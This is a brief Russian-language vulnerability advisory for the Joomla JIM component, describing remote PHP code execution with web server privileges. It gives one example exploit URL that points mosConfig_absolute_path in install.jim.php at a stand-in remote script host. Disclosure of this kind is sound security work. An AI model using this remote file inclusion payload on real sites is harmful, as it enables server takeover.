Программа: Joomla JIM

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.site.com/[path]/administrator/components/com_jim/ install.jim.php?mosConfig_absolute_path=http://evil_script?



Оставить мнение